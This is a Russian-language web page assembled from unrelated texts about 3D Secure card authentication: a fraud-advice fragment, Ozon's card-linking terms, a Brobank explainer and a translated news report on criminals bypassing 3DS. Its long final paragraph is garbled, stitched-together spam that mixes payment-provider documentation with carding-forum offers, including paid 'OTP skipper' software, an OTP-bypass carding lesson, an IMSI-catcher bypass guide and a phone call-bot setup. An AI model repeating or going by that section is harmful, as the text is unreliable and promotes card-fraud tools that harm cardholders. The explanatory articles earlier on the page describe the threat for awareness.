Срочно сообщите об этом банку. Тогда вы с большой вероятностью сможете опротестовать мошеннические операции, особенно когда 3D-Secure не использовался. Это плюс карт по сравнению с наличными, которые воры вам вряд ли вернут.

Даже если оспорить покупку или перевод не выйдет, есть возможность заморозить ваши деньги на счетах мошенников, чтобы впоследствии вернуть их по требованию правоохранителей.

Редакция 66.RU благодарит банк для предпринимателей «Точка» за помощь в подготовке материала.

Условия привязки карты на сайте Ozon.ru

1. В целях упрощения оформления Заказов на Сайте и ускорения процесса их
оплаты, Клиент привязывает свою банковскую карту к своему Личному
кабинету посредством указания всех ее данных (далее — «Привязанная
карта») и одноразового прохождения авторизации по технологии 3-D Secure.
После совершения вышеуказанных действий на Карте блокируется контрольная
сумма для её проверки. Данная сумма не списывается и является только
подтверждением действительности Привязанной карты.

После подтверждения Привязанной карты, она сохраняется в Личном кабинете
и доступна как отдельный способ оплаты при оформлении Заказов.

2. Озон не осуществляет обработку, в том числе сбор и хранение данных
банковских карт Клиентов. Данные Привязанной карты хранятся и
обрабатываются платежными провайдерами ASSIST, Яндекс.Деньги, либо иным
платежным провайдером.

3. Клиент подтверждает и гарантирует:

• указание им достоверной информации о действительной банковской
  карте, выданной на его имя;
• соблюдение им правил международных платежных систем и требований
  банка-эмитента, выпустившего Привязанную карту, в том числе в
  отношении порядка проведения безналичных расчетов.

4. Привязывая банковскую карту в соответствии с настоящими Условиями,
Клиент полностью соглашается с применением технологии проведения
платежей, при которой данные Привязанной карты сохраняются на стороне
платежных провайдеров и используются в дальнейшем для проведения
платежей без авторизацию через 3-D Secure и без ввода CVV/CVC.

5. Платеж с Привязанной карты инициируется Клиентом в момент оформления
Заказа на Сайте (нажатие на кнопку «Оформить заказ») при выборе способа
оплаты «Сохраненные карты» с соответствующими реквизитами Привязанной
карты, и не требует дополнительного подтверждения платежа.

6. Привязка Карты означает полное и безоговорочное согласие Клиента с
настоящими Условиями (п. 3 ст. 438 ГК РФ), а также положениями
документов, на которые ссылаются Условия. В случае несогласия Клиента с
положениями указанных документов, в том числе в связи с их изменением,
Клиент вправе удалить данные Привязанной карты из Личного кабинета.

7. Все термины с большой буквы используются в значениях, установленных
Условиями продажи товаров для физических лиц в
Ozon.ru
(https://docs.ozon.ru/common/pravila-prodayoi-i-rekvizity/usloviya-prodayoi-tovarov-dlya-fizicheskih-lits-v-ozon-ru/).

8. Во всем остальном, что касается проведения платежей на Сайте,
действует раздел 5 Условий продажи товаров для физических лиц в Ozon.ru.

что это такое, как подключить и отключить

В рамках обслуживания банковских карт эмитенты обязаны гарантировать сохранность денежных средств клиентов. На это банк тратит по-настоящему большие деньги. С развитием современных технологий разрабатываются новые инструменты безопасности. Один из них — 3D Secure: что это такое и как работает, расскажет портал Бробанк.ру.

Что такое технология 3D Secure

3D Secure — это разновидность XML-протокола, который используется в виде дополнительного уровня безопасности при совершении операций с банковскими картами в интернете. Протокол предусматривает проведение двухфакторной аутентификации клиента до завершения транзакции.

Впервые 3D Secure использовалась компанией VISA в рамках пакета услуг Verifled by VISA (VBV). Основная цель работы с протоколом — повышение уровня безопасности банковских карт при совершении операций в онлайне. Протокол применяется по кредитным и дебетовым картам.

Позже, пакет услуг стали применять все крупнейшие мировые платежные системы. Подключение производилось компаниями в следующем порядке:

• Mastercard — Mastercard Secure Code (MCC).
• JCB International — J/Secure.
• Amex — Safe Key.
• НСПК МИР — МИР Accept.
• American Express — American Express Safe Key.

Национальная система платежных карт МИР подключилась к 3D Secure в 2016 году. Сейчас все банковские карты выпускаются с подключенным по умолчанию пакетом. Отключить его нельзя — услуга оказывается бесплатно, вне зависимости от наименования банковской карты.

Протокол 3D Secure не следует рассматривать как 100% гарантию сохранности средств на счете. Он всего лишь предусматривает дополнительный шаг со стороны клиента при совершении CNP-операций (card not present) — когда не предъявляется карта.

Практика показала, что разовый код может быть перехвачен мошенниками: достаточно подвергнуть устройство воздействию вируса или вредоносного программного обеспечения. Технология снижает вероятность применения фишинга, но не исключает ее полностью.

Расшифровка термина

Инструмент получил такое наименование по причине одновременной работы трех доменов сразу (отсюда и название 3-D). Первый — домен продавца и кредитной организации, в которую перечисляются деньги. Второй — домен эмитента, выпустившего банковскую карту. Третий — домен совместимости (Interoperability Domain), предоставляемый платежной системой для поддержки работы протокола безопасности 3D Secure.

Как работает 3D Secure

При совершении операции в интернете, держатель карты, поддерживающей технологию 3D Secure проходит аутентификацию в два этапа. Протокол не нужно путать с кодами безопасности CVV2 и CVC2. Использование протокола производится следующим образом:

1. Клиент завершает оформление операции, и нажимает на кнопку «Оплатить».
2. Банк высылает разовый пароль (числовой код), который вводится в форму подтверждения платежа.

Если код указывается неверно, эмитент блокирует проведение транзакции. Как правило, разовый код 3D Secure состоит из шести случайных чисел, которые генерируются отдельно по каждой операции. Протокол работает на телефонах, смартфонах, персональных компьютерах, и все остальных устройствах.

У некоторых банков действует правило, согласно которому 3-5 раз неверно введенный код приводит к автоматической блокировке банковской карты. Таким образом, эмитент исключает доступ к карте со стороны третьих лиц.

Числовой код отправляется в виде СМС-сообщения, либо другим способом. Отдельные кредитные организации используют в этих целях push-уведомления. Для совершения операции необходимо иметь при себе телефон, привязанный к карте. За отправку кода плата не взимается.

3D Secure с многоразовым паролем

По некоторым картам технология 3D Secure используется виде многоразового пароля. Его клиент получает при активации карты. Этот вариант намного экономичнее, чем отправка числового кода, но уровень безопасности при его использовании еще ниже.

По стандартной схеме мошенникам потребуется перехватить одноразовый числовой код, либо завладеть телефоном держателя карты. Намного проще получать доступ к счету, когда по всем транзакциям используется один и тот же пароль.

Достаточно узнать этот самый пароль, чтобы по карте совершать практически любые операции. В этом виде технология используется небольшими банками, продукты и услуги которых не пользуются хорошим спросом у потребителей. Причина заключается в дороговизне подключения XML-протокола.

Проблемы с безопасностью при наличии 3D Secure

Часть держателей банковских карт совершенно ошибочно полагают, что наличие технологии 3D Secure полностью исключает несанкционированный доступ к счету. Подобное заблуждение часто приводит к непоправимым последствиям.

Дело в том, что некоторые интернет-магазины и прочие торговые площадки не поддерживают данную технологию безопасности. Покупки на этих ресурсах совершаются без аутентификации клиента.

По такому сценарию любой человек, знающий номер карты, инициалы держателя, срок действия и защитный код, может сделать покупку по карте в обход разрешения со стороны законного держателя. И подобных случаев встречается масса. Наличие 3D Secure никак не влияет на такие проблемы. За год с банковских карт пропадает огромная сумма, и вопрос сохранности средств пока для банков остается открытым.

Узнать, поддерживает ли интернет-магазин технологию безопасности можно на его титульной странице. Здесь должны быть отображены логотипы Mastercard Secure Code, Verifled by VISA, МИР Accept (для пользователей из Российской Федерации). Если соответствующих обозначений на сайте интернет-магазина нет, значит, покупки здесь производятся без дополнительной аутентификации клиентов.

Что такое Liability Shift

Использование 3D Secure по карте не исключает доступ к счету со стороны третьих лиц. При утрате денежных средств кто-то должен понести ответственность. Клиенты, в первую очередь, возлагает всю вину на банк, который может применить Liability Shift — перенос ответственности. Эта процедура подразумевает, что банк может оспорить транзакцию, и вернуть деньги на счет клиента. Для этого необходимо:

• Наличие опции 3D Secure на карте.
• Отсутствие технологии в интернет магазине — когда торговая точка работает без дополнительной аутентификации клиента.

Если мерчант (торгово-сервисное предприятие) не проводит дополнительную аутентификацию покупателей, и кто-то воспользуется ворованной картой, то банк-эмитент может перенести ответственность на интернет-магазин по требованиям, которые ему (банку) предъявляет клиент.

Причина этого: банк позаботился о безопасности счетов своих клиентов, а магазин — нет. Следовательно, конечная вина может быть возложена на мерчанта. Но для этого держатель карты должен предпринять первичные действия — обратиться с требованиями о возврате суммы к банку-эмитенту, а также доказать, что операция совершена несанкционированно.

Как подключить и отключить 3D Secure на карте

3-DS в большинстве случаев подключается по умолчанию. Клиент для этого не совершает никаких действий. После активации карты технология начинает действовать в автоматическом режиме. При этом в некоторых банках подключать опцию необходимо вручную. Делается следующими способами:

• Через банкомат.
• В офисе банка.
• В интернет-банкинге.
• По телефону.

К примеру, у Сбербанка, Тинькофф Банка, Альфа-Банка и других крупных кредитных организаций технология подключена по умолчанию. Клиенту для ее активации никаких действий совершать не нужно. У Промсвязьбанка и ВТБ услуга подключается клиентом самостоятельно.

Отключение опции в ряде случаев не предусматривается. У Сбербанка ранее можно было подключать и отключать технологию безопасности в Сбербанк Онлайн. Сейчас, по современным картам, деактивация по желанию клиента не производится.

Как узнать, есть ли на карте 3D Secure

Самый простой и верный способ — изучение описания к продукту. Специалисты сервиса Brobank.ru составляют экспертные описания к банковским картам. Цель этой работы — дать пользователю полную картину о предложении, за которым он собирается обратиться в банк. Если карта оформлена после 2016 года, то технология безопасности, скорее всего, подключена по умолчанию.

Второй вариант — попытаться совершить какую-нибудь операцию в интернет-магазине, в котором используется двухэтапная аутентификация покупателей. Найти такой магазин не составит труда — крупнейшие площадки уже продолжительное время работают с повышенными мерами безопасности. После того, как подходящий магазин будет найден, необходимо совершить следующие действия:

1. Оформить к покупке любой товар.
2. Заполнить форму с реквизитами карты.
3. Перейти к оплате.

Завершать операцию покупкой товара нет необходимости. Если на телефон придет числовой код, который система предложит ввести в отдельное поле, значит, на карте полноценно работает технология безопасности 3D Secure. Если СМС-сообщение с кодом не придет, то, соответственно, опция отсутствует, либо ее нужно подключать вручную (активировать).

Об авторе

Анатолий Дарчиев — высшее экономическое образование по специальности «Финансы и кредит» и высшее юридическое образование по направлению «Уголовное право и криминология» в Российском Государственном Социальном Университете (РГСУ). Более 7 лет проработал в Сбербанке России и Кредит Европа Банке. Является финансовым советником крупных финансовых и консалтинговых организаций. Занимается повышением финансовой грамотности посетителей сервиса Бробанк. Аналитик и эксперт по банковской деятельности.
[email protected]

Эта статья полезная?

ДаНет

Помогите нам узнать насколько эта статья помогла вам. Если чего-то не хватает или информация не точная, пожалуйста, сообщите об этом ниже в комментариях или напишите нам на почту [email protected].

Комментарии: 0

киберпреступников находят способы обойти систему предотвращения мошенничества «3D Secure»

Исследователи безопасности из компании Gemini Advisory по анализу угроз говорят, что они наблюдали действия в темной сети, связанные с обходом 3D Secure (3DS), который разработан для повышения безопасности онлайн-транзакций по кредитным и дебетовым картам.

Разработанный как дополнительный уровень защиты для этих транзакций, 3DS видел несколько выпусков, самый последний из которых, а именно версия 2.0, также предназначенный для использования со смартфонами, позволяющий аутентифицироваться по отпечатку пальца или распознаванию лица.

В дополнение к различным тактикам социальной инженерии, которые злоумышленники могут использовать для обхода 3DS, фишинговые и мошеннические страницы позволяют им обманом заставить жертв раскрыть данные своей карты и информацию для подтверждения платежа.

Исследователи безопасности

Gemini говорят, что уязвимости в более ранних версиях 3DS могли быть использованы для обхода безопасности. Одной из таких проблем было использование пароля для транзакции, поскольку иногда это был персональный идентификационный номер (PIN), который киберпреступники могли получить с помощью различных средств.

Используя различные методы социальной инженерии, такие как выдача себя за представителя банка, киберпреступники могут собирать у жертв много информации, включая имя, идентификационный номер, номер телефона, физический адрес и адрес электронной почты, девичью фамилию, номера водительских прав и т. Д. Вооружившись некоторой личной информацией (PII), злоумышленник может обманом заставить жертву поделиться дополнительной информацией.

Один из методов, рекомендуемых некоторыми киберпреступниками для обхода 3DS, заключается в том, чтобы позвонить жертве с номера телефона, который подделывает номер на обратной стороне платежной карты, и обманом заставить ее подтвердить транзакцию, которую в настоящее время совершает мошенник, утверждая, что это необходимо для в целях проверки личности.

Использование фишинговых сайтов, имитирующих законные интернет-магазины, также может позволить хакерам собирать информацию о картах жертв и обманным путем заставить их авторизовать платеж через 3DS. В некоторых случаях злоумышленники могут использовать вредоносное ПО для нацеливания на смартфоны пользователей и получения проверочных кодов 3DS.

Киберпреступники также могут злоупотреблять тем, что некоторые интернет-магазины отключают функцию 3DS для небольших покупок. Таким образом, после тестирования лимита хакеры совершают покупки на меньшую сумму.

Использование PayPal также позволяет злоумышленникам обойти 3DS. Для этого они добавляют информацию о украденной платежной карте в учетную запись PayPal, а затем совершают покупки, используя метод оплаты PayPal. Эта схема лучше всего работает с кредитными картами, поскольку PayPal не всегда требует подтверждения пользователя путем выдачи проверочных кодов (для чего также потребуется доступ к банковскому счету).

По словам Gemini, следующим шагом в эволюции защиты транзакций с помощью онлайн-карт станет надежная проверка подлинности клиентов (SCA), которая защищает инициированные клиентами платежи и может быть выполнена с помощью 3DS 2.Сделки на определенные суммы могут быть освобождены от проверки.

«Старые версии 3DS, такие как версия 1.0 (которая до сих пор широко используется во всем мире), уязвимы для хакеров, которые находят способы обойти свои функции безопасности. […] Gemini Advisory с умеренной уверенностью оценивает, что киберпреступники, вероятно, будут продолжать полагаться на социальную инженерию и фишинг, чтобы обойти меры безопасности 3DS », — заключает Gemini.

Связано: новые атаки позволяют обойти проверку PIN-кода карты EMV

Связано: киберпреступники могут клонировать платежные карты, используя украденные данные EVM

Ионут Аргире — международный корреспондент SecurityWeek.Предыдущие столбцы от Ionut Arghire: Теги:

Средство обхода 3D-безопасности

Реагирование на инциденты — Когда сбываются кошмары — Аудиты и пен-тестирование помогают держать плохих парней в страхе и делают вас более сложной целью для проникновения. Gemini нашла на форумах в даркнете несколько человек, занимающихся безопасными платежами, подтвержденными Visa. Он обеспечивает дополнительный уровень безопасности в последней версии WineDirect для… Чтобы избежать мошенничества в CB, чтобы защитить код 3D Secure, посланник для общего общества.3D Secure 2 (также называемый EMV 3-D Secure, 3D Secure 2.0 или 3DS2) направлен на устранение многих недостатков 3D Secure 1 путем введения… Как работает проверка Visa. Люди, которые заявляют, что продают вам бункеры здесь, это риск. Этот SMS OTP используется банками для аутентификации… Картирование, обналичивание, взлом дебетовой / кредитной карты и сбросы, Как обойти проверку OTP (3D) во время кардинга. Когда вы покупаете товары или оплачиваете услуги в Интернете, вам часто требуется аутентифицировать свои платежи с помощью инструмента защиты от мошенничества, известного как 3D Secure.К сожалению, вы не можете обойти это, единственная консоль, которая не нуждается в ней, — это 2DS, потому что в ней вообще нет 3D Slider или 3D. В остальном, чтобы не затопить систему, я добавил ценник к ним. заинтересован в получении моего программного обеспечения / приложения OTP skipper. 3-D Secure 2.0 непосредственно рассматривает несколько основных жалоб на исходный инструмент. У меня проблемы с обходом кода 3D-безопасности. Пример 1. Когда кто-то пытается зарядить карту, проверочный код будет быть отправлено на зарегистрированный номер телефона или адрес электронной почты.Держателям стандартных банковских карт больше не нужно регистрировать / активировать 3D Secure. SafePass — это дополнительный уровень безопасности, который требуется в онлайн- и мобильном банкинге для увеличения лимитов для определенных типов переводов. Затем PG перенаправляет пользователя прямо на страницу банка-эмитента или страницу с 3D-безопасностью, запрашивая авторизацию транзакции. 65 Доставка: США Зарегистрируйтесь сейчас. Держатель карты использует эту информацию для оценки риска транзакции. В противном случае 3D Secure будет недоступен для указанного вами ценового диапазона.Новости oglasi, najčitaniji oglasi u Srbiji Независимо от того, зарегистрирована ли ваша учетная запись в 3D Secure, вы никогда не должны обрабатывать транзакцию Maestro, вводя номер карты непосредственно в Панели управления. В большинстве случаев карты Maestro полагаются на технологию 3D Secure. Эта технология имеет множество аналогов для разных брендов карт, включая Verified by Visa, ProtectBuy от Discover, American Express SafeKey и J / Secure от JCB International. Mastercard представила этот инструмент с целью сделать онлайн-транзакции более безопасными, что принесет пользу как продавцам, так и … Получение доступа к онлайн-банкингу кредитной карты через регистрацию и дальнейшие манипуляции с этой картой — очень непостоянный процесс, включающий множество нюансов.Картограф местных предложений eBay. Производитель: nouvistore. 3D Secure 1.0 впервые появился как система предотвращения мошенничества с целью защиты транзакций по кредитным и дебетовым картам. Домен совместимости, который представляет собой инфраструктуру, обеспечиваемую схемами кредитных карт, для поддержки… 3D Secure 1.0 — это протокол на основе XML, который позволяет пользователям использовать защиту паролем, назначая ключ для своей карты, который препятствует процессу проверки при запуске транзакции. . Что такое 3D Secure? Следующие коды статуса 3D Secure приведут к сдвигу ответственности: Подробнее об этих статусах можно узнать в нашей документации для разработчиков.UBL 3D Secure — это бесплатная услуга, предоставляемая UBL для защиты транзакций электронной торговли клиентов, выполняемых с помощью Visa и Mastercard, с помощью метода одноразового пароля в сотрудничестве с большинством ведущих онлайн-магазинов. Если клиент звонит, и мы размещаем для него заказ через страницу администратора, то 3d secure следует игнорировать. Примечание: обход должен быть активирован в вашем интернет-магазине. … Пользователи Coinbase из Европы также могут использовать карту 3D Secure для покупки криптовалют. Hustlers, самый обсуждаемый платежный протокол 3D-Secure, будет продолжать разворачиваться в течение 2021 года и далее, те из вас, кто адаптируется, продолжат выживать и процветать, а те, кто проигнорирует это, останутся позади, чтобы поймать пыль, в этом руководстве по Cashoutempire сегодня мы предоставим вам актуальную информацию о том, как создать собственный уловитель IMSI для обхода 3D-Secure … После этого служба безопасного онлайн-кода становится обязательной.Пятница, 5 марта 2021 г. Исследователи безопасности из компании Gemini Advisory по анализу угроз говорят, что они заметили упражнения в темной сети, связанные с обходом 3D Secure (3DS), который предназначен для повышения безопасности онлайн-транзакций по кредитным и дебетовым картам. Одноразовый PIN-код (OTP) будет отправлен вам по SMS или электронной почте. Киберпреступники находят способы обойти систему предотвращения мошенничества «3D Secure». Киберпреступники находят способы обойти систему предотвращения мошенничества «3D Secure» 2 месяца назад A. Уникальный инструмент использует вероятность для оценки выигрыша.Безопасное решение для того, чтобы ваши пароли в Интернете были у вас под рукой. Калькулятор права на кредитную карту и ссуды. Accenture приобретает французскую фирму по кибербезопасности Openminded 30 апреля 2021 г. Без комментариев. Это снижает вероятность мошенничества при использовании поддерживаемых карт и повышает производительность транзакций. Показывает, какие самые популярные карты и ссуды вы получите с наибольшей вероятностью. Киберпреступники находят способы обойти систему предотвращения мошенничества «3D Secure» 2 месяца назад A. Если клиент звонит, и мы размещаем для него заказ через страницу администратора, то 3d secure следует игнорировать.В настоящее время мы поддерживаем 3D Secure для большинства продавцов в США, Канаде, Европе, Австралии и Азиатско-Тихоокеанском регионе. Я раздам ​​метод и программное обеспечение по цене 200 долларов. Киберпреступники постоянно изучают и документируют новые способы обхода протокола 3D Secure (3DS), используемого для авторизации онлайн-транзакций по картам. Вы будете перенаправлены на безопасный экран 3D вашего банка. Повысьте безопасность платежей и предотвратите несанкционированное использование кредитных карт. Gemini обнаружила на форумах в темной сети нескольких человек, занимающихся деятельностью, связанной с обходом меры безопасности 3D Secure (3DS), которая представляет собой протокол, разработанный как дополнительный уровень безопасности для онлайн-транзакций по кредитным и дебетовым картам.Присоединился 03.12.19 Сообщения 22 Оценка реакции 0 Баллы 1. Теперь есть новый инструмент под названием 3D Secure 2.0, который упрощает выполнение требований SCA, не нарушая взаимодействия с пользователем. 3DS обеспечивает уровень безопасности для онлайн-покупок с использованием дебетовых и кредитных карт. Пример. Большинство поставщиков кредитных / дебетовых карт теперь добавляют к своим картам дополнительный уровень безопасности, который защищает владельца от любого несанкционированного доступа. Мы обновили нашу интеграцию с 3D Secure в рамках подготовки к требованиям соответствия 3DS2 и PSD2 Strong Consumer Authentication (SCA).ИНСТРУМЕНТЫ 3D SECURE BYPASS OTP 2021 ПОСЛЕДНЕЕ ОБНОВЛЕНИЕ 22.04.2021. Принимать карты без защиты 3D для авторизации. Поскольку 3D secure — это схема, по которой покупатели должны зарегистрироваться, у некоторых клиентов на вашем сайте эта возможность отключена. Имя относится к «трем доменам», которые взаимодействуют с помощью протокола: домен продавца / эквайера, домен эмитента и домен взаимодействия. # 5 25 августа 2016 Член OP Ясин Ахаммед 3D Secure — это дополнительный уровень безопасности для онлайн-транзакций по кредитным и дебетовым картам, который добавляет этап аутентификации для клиентов, совершающих онлайн-покупки.Чтобы начать поддержку 3D Secure, вам нужно обновить свой код через API, а затем связаться с нами для регистрации. Киберпреступники постоянно изучают и документируют новые способы обхода протокола 3D Secure (3DS), используемого для авторизации онлайн-транзакций по картам. Если вы хотите получить освобождение от 3D Secure… 18 января 2021 г. # 15 BAD_HUNTER Newbie. На шестой LVT или когда совокупная сумма LVT превышает 100 EUR, необходимо выполнить аутентификацию 3D-Secure. Правильное применение исключений SCA дает продавцам возможность обойти 3D Secure для значительного количества транзакций.Скачайте Bypass бесплатно. https://developers.braintreepayments.com/guides/3d-secure/server-side Я создал программное обеспечение, которое обходит OTP и позволяет совершать успешные транзакции с картами 3D Secure. Когда запрос на оплату включает объект browserInfo, Adyen определяет, проходит ли платеж через аутентификацию 3D Secure. Я нашел исходный код безопасного приема cybersource GitHub, который основан на веб-приложении и лучше всего соответствует нашим потребностям. Одноразовый пароль 3D Secure mengirimkan password khusus ke nomor telepon genggam Anda yang sudah terdaftar di sistem Bank setiap kali Anda melakukan pembelanjaan online di merchant yang… Однако некоторые компании, такие как PAAY, теперь предлагают плагины и API, которые обходят пароль, кроме транзакций которые не соответствуют определенным критериям.Март 2021 года. Исследования показывают, что преступники делятся идеями социальной инженерии для кражи статических и одноразовых паролей, используемых с 3D Secure и другими. В рамках нашего полного решения мы также предлагаем услуги по сертификации для ваших проектов. Вы можете подтвердить, настроена ли ваша учетная запись для 3D Secure в Панели управления; учить больше. Если вы находитесь в США и используете Amex SafeKey, вам необходимо выполнить дополнительные действия по настройке и интеграции. 3D Secure — это инструмент для онлайн-транзакций, который требует, чтобы владелец учетной записи прошел процесс аутентификации для некоторых покупок.Fortnite Peekaboo Tv Fortnite Twitch. Ионут Аргир, 04 марта 2021 г. Нажмите здесь, чтобы связаться со мной, если вы хотите совершить покупку. Это протокол безопасности, который добавляет уровень аутентификации в онлайн-процессе проверки без предъявления карты для проверки личности держателя карты до авторизации. Просто перейдите к оформлению заказа и следуйте инструкциям. Мы поддерживаем следующее: В Braintree во время оформления заказа выполняется поиск по 3D Secure Lookup. Чтобы уточнить, когда клиент покупает продукт через интерфейс сайта, он должен пройти через 3d secure.Это позволило предприятиям принимать платежи в биткойнах и получать фиатные деньги. Во-первых, возможно, что 3D Secure 2.0 может отпугнуть хороших клиентов и ограничить ваш потенциал заработка. Согласно Википедии, это пароль, который действителен только для одного сеанса входа в систему или транзакции в компьютерной системе или другом цифровом устройстве. Исследователи безопасности из компании Gemini Advisory по анализу угроз говорят, что они наблюдали действия в темной сети, связанные с обходом 3D Secure (3DS), который предназначен для повышения безопасности онлайн-транзакций по кредитным и дебетовым картам.Включив 3D Secure вместе с инструментами защиты от мошенничества Braintree, вы снизите риск мошенничества и возвратных платежей. Киберпреступники постоянно изучают и документируют новые способы обхода протокола 3D Secure (3DS), используемого для авторизации онлайн-транзакций по картам. 2. Если мошеннический заказ все же будет выполнен, продавец, использующий 3D Secure, с меньшей вероятностью будет привлечен к ответственности. Благодаря SecureCode ваш банк генерирует одноразовый код, который отправляется на ваш мобильный телефон через SMS. К инструменту предъявляется множество требований.Предварительные требования включают кабель OTG, флешку, компьютер и подключение к Интернету. Если на вашем устройстве установлена ​​последняя версия Android, нет гарантии, что инструмент будет работать на вас. Процесс обхода сложен и требует технических средств. При использовании карты Mastercard в Интернете вам может потребоваться идентифицировать себя как уполномоченного владельца карты. Такой подход возможен для всех транзакций или только для транзакций OneClick. Включив 3D Secure вместе с EMVCo, организация, состоящая из шести основных карточных сетей, недавно выпустила новую версию 3D Secure.Когда вы делаете! Call 3312345678 paypal, Discord Bot отправляет почтовый запрос на наш частный api, который сохранит вызов в нашу базу данных sqlite и отправит вызов нашему twilio API. Причина, по которой мне нужно обойти 3D secure, заключается в том, что он может принимать заказы по телефону (или в пунктах продажи). Вам необходимо отправить электронное письмо на горячую линию. Мы предлагаем продавцам три альтернативы стандартному процессу 3D Secure: Flex 3D Secure, где продавцы могут точно настроить реакцию 3D Secure для обхода 3D Secure… 3-D Secure использует принятие решений на основе риска для классификации транзакции как высокой или низкой. .Нет ничего лучше веб-сайта обхода OTP, но я смог придумать метод (программное обеспечение) для обхода страницы OTP, аутентификации транзакции и вызова URL-адреса успешной транзакции. Транзакции Maestro, созданные в Панели управления, могут сначала показаться успешными, но в конечном итоге они будут отклонены. Следуйте инструкциям, чтобы получить код безопасности 3D. Realex — добавлена ​​настройка обхода 3D secure для заказов до определенного значения; Authipay — та же настройка, что и выше. Вы можете выбрать любой номер в соответствии с вашей страной.Успешная аутентификация 3D Secure может переложить ответственность за мошеннические возвратные платежи с продавца на эмитента карты. Если владелец карты зарегистрирован в 3D Secure, банк-эмитент решит, можно ли подтвердить личность держателя карты с использованием предоставленных данных о держателе карты и его устройстве, или требуется дополнительный процесс аутентификации. Находите поблизости дешевые товары только самовывозом — они часто привлекают меньше предложений. Киберпреступники постоянно изучают и документируют новые способы обхода протокола 3D Secure (3DS), используемого для авторизации онлайн-транзакций по картам.3D Secure помогает участникам дебетовой карты UBL делать покупки в Интернете с дополнительной защитой и уверенностью. Эта дополнительная безопасность была инициирована и создана Visa и MasterCard, и она помечена как «Проверено…». Для получения дополнительной информации см. Руководство по миграции. Обсуждения на подпольных форумах предлагают советы о том, как обойти последний вариант функции безопасности, объединив социальную инженерию с фишинговыми атаками. Поскольку меры безопасности, такие как 3D-протоколы, проверочные звонки, уведомления по электронной почте и другие, усложняют деятельность кардера, способы обхода таких мер станут более популярными.У большинства брендов карт есть собственные службы 3D Secure. Киберпреступники постоянно изучают и документируют новые способы обхода протокола 3D Secure (3DS), используемого для авторизации онлайн-транзакций по картам. (Вы можете проверить Список бесплатных одноразовых номеров, предоставляющих веб-сайты). Домен эквайера, который является банком и продавцом, получающим платеж 2. Он выполняет транзакцию с украденными картами рядом с… Другая разблокировка для обхода безопасности V3.7 Оригинал FRP Unlocker — это приложение, предназначенное для обхода защиты от сброса настроек. Обход разблокировки V3.7 All Unlock Tool Последнее обновление, необходимое для разблокировки устройства с помощью блокировки FRP. Киберпреступники адаптируются к обходу 3D Secure. Как только это происходит, веб-сайт или платформа электронной коммерции направляет клиента к платежному шлюзу, где он или она вводит всю необходимую информацию о банке или карте, которую они используют для оплаты. SafePass использует 6-значный одноразовый код, отправляемый в текстовом сообщении на ваш мобильный телефон Сноска 1, чтобы помочь подтвердить вашу личность перед авторизацией перевода средств с вашего счета.Включение 3D Secure также позволяет вам принимать кредитные карты, которые в противном случае вы не могли бы принять из-за ограничений (например, 3D secure обеспечивает дополнительный уровень безопасности как для вас, так и для ваших клиентов, помогая предотвратить кражу и использование данных карты в Интернете. Ваш адрес электронной почты не будут опубликованы. Mastercard SecureCode — это бесплатный инструмент безопасности 3D Secure, аналогичный использованию PIN-кода при оформлении заказа. Информация о динамическом обходе 3-D Secure описана в руководстве по настройке.0 0 Время чтения: 2 минуты, 29 Второй .3D Secure — это инструмент, который поможет вам безопасно совершать онлайн-платежи. Безопасная удаленная коммерция Защита от мошенничества Защита от мошенничества — это интегрированный инструмент управления рисками, разработанный PayPal, чтобы предоставить продавцам возможность принимать более точные решения в режиме реального времени по транзакциям с картами и кошельками, с целью уменьшения количества ложных … Введите код, чтобы завершить свою порядок. Маэстро). 3D Secure безопаснее, чем обычная обработка карт, для вас и ваших клиентов. Не все транзакции, обрабатываемые с помощью 3D Secure, автоматически переносят ответственность — и изменение ответственности не всегда вызывает автоматическое представление возврата платежа.Цель состоит в том, чтобы обход был автоматическим и прозрачным. Механизмы проверки личности зависят от держателя карты и банка-эмитента, но могут включать в себя одноразовый код доступа по SMS, мобильное приложение банка-эмитента, методы биометрического распознавания, такие как отпечаток пальца или голосовой отпечаток, или другие средства. Люди на нескольких форумах даркнета делятся друг с другом … 9 марта 2020 г. # 6 Обойти это не обязательно. 3D Secure совместим только с кредитными и дебетовыми картами, а также с транзакциями Secure Remote Commerce. Причина, по которой мне нужно обойти 3D secure, заключается в том, что он может принимать заказы по телефону (или в пунктах продажи).Он также обеспечивает защиту от мошенничества с использованием карты для продавца и его банка-эквайера, держателя карты и его банка-эмитента карты, а также сетей Card Association (Visa, MasterCard). © 2021 PayPal, снизьте риск мошенничества и возвратных платежей, требования соответствия PSD2 Strong Consumer Authentication (SCA), Mastercard Identity Check и Mastercard Securecode. Щелкните значок шестеренки в правом верхнем углу. Эквайер будет нести ответственность за сумму мошенничества. Надеюсь, вам понравился урок о том, как обойти OTP при кардинге 2019…. Мы будем использовать ваши отзывы вместе с моим личным обзором в качестве дополнительного инструмента, который поможет вам улучшить ваш будущий опыт. Наше решение 3D Secure 2 использует биометрию и другие методы для быстрой и плавной аутентификации на любом устройстве. Альтернативы стандартному 3D Secure. Xecure3D ACS (Access Control Server) — это программный модуль, который позволяет банкам-эмитентам участвовать в программах Verified by Visa, MasterCard SecureCode, JCB J / Secure и American Express Safekey 3D Secure. Несмотря на то, что регистрация в 3D Secure обеспечивает большую гибкость при приеме карт Maestro, вы не можете использовать повторяющееся выставление счетов с картами Maestro при регистрации в 3D Secure.Инструмент для переноса изображений версии 4 по всему сайту, по категориям или по коду продукта; Стресс-тестирование и возврат zip-файла с необработанными файлами и полным контрольным следом; Возможность обойти 3D Secure. Во-первых, вам нужно связаться с нами, чтобы начать процесс настройки. Или есть решение. Ваш электронный адрес не будет опубликован. Эти продукты используются более чем в 30 странах мира и в некоторых из крупнейших международных корпораций. 3-D Secure Mobile SDK — это SDK, сертифицированный EMVCo для Android и iOS.Продавцам настоятельно рекомендуется использовать 3D Secure для повышения уровня защиты от мошенничества. Для этого: American Express Safekey не активируется автоматически с 3D Secure и доступен только продавцам, которые обрабатывают American Express через Amex Direct. Securecode — это внедрение технологии 3-D Secure под брендом Mastercard. Закрывать. Киберпреступники находят способы обойти систему предотвращения мошенничества 3D Secure от rootdaemon 4 марта 2021 г. Исследователи безопасности из компании Gemini Advisory по анализу угроз говорят, что они наблюдали действия в темной сети, связанные с обходом 3D Secure (3DS), который предназначен для повышения безопасности онлайн-транзакции по кредитным и дебетовым картам.io mod взлом чит godmode — moomoo. Затем вы будете перенаправлены обратно на страницу подтверждения заказа лучших материалов. Другая версия Security Bypass Unlock V3.7 Original. FRP Unlocker — это приложение, предназначенное для обхода защиты от сброса до заводских настроек. Этот инструмент на 100% работает. Другой инструмент обхода безопасности V3.7 All Unlock Tool. Последнее обновление, которое вам нужно, чтобы разблокировать ваше устройство от блокировки FRP. 